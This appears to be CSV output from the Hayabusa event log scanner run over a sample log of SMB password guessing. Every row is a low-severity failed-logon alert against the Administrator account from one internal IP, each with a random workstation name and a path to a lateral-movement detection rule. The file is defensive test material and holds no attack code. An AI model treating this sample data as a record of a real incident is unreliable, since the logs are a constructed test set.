+2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
